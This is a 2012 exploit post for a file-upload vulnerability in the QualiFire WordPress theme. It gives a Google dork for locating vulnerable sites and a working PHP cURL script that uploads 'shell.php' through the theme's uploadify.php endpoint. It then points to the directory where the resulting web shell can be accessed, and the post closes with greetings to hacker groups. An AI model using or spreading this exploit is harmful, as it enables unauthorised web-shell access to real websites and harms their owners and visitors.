facebook facebook twitter rss

Wordpress Themes QualiFire File Upload Vulnerability

Author: Tn_Scorpion , Published: 01-07-2012
#######################################################################
Exploit Title: Wordpress Themes QualiFire File Upload Vulnerability
Google Dork: inurl:wp-content/themes/qualifire
Date: 30/06/2012
Author: Tn_Scorpion
Software Link: http://themeforest.net/item/qualifire-wordpress-theme/105879 ( it's not free 40$ )
#######################################################################

[+] exploit

<?php
 
$uploadfile
="shell.php";
$ch curl_init("http://example.com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS,
              array(
'Filedata'=>"@$uploadfile",
              
'folder'=>'/wp-content/themes/qualifire/scripts/admin/uploadify/'));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
 
  print 
"$postResult";
?>


Shell Access : http://www.exemple.com/wp-content/themes/qualifire/scripts/admin/uploadify/

#######################################################################

Gr33rz to : Tunisian spl01t3r , Maxim Tatto , KillerMind , Hacker-1420 , Anas Laribi , H3rcule-32 , dOctor.Virus ,
KinG Of Controle , King Of Pirates , Ked Ans ....... & All Muslim Hackers
Profile : www.facebook.com/Viva.Hackers

Like us on Facebook :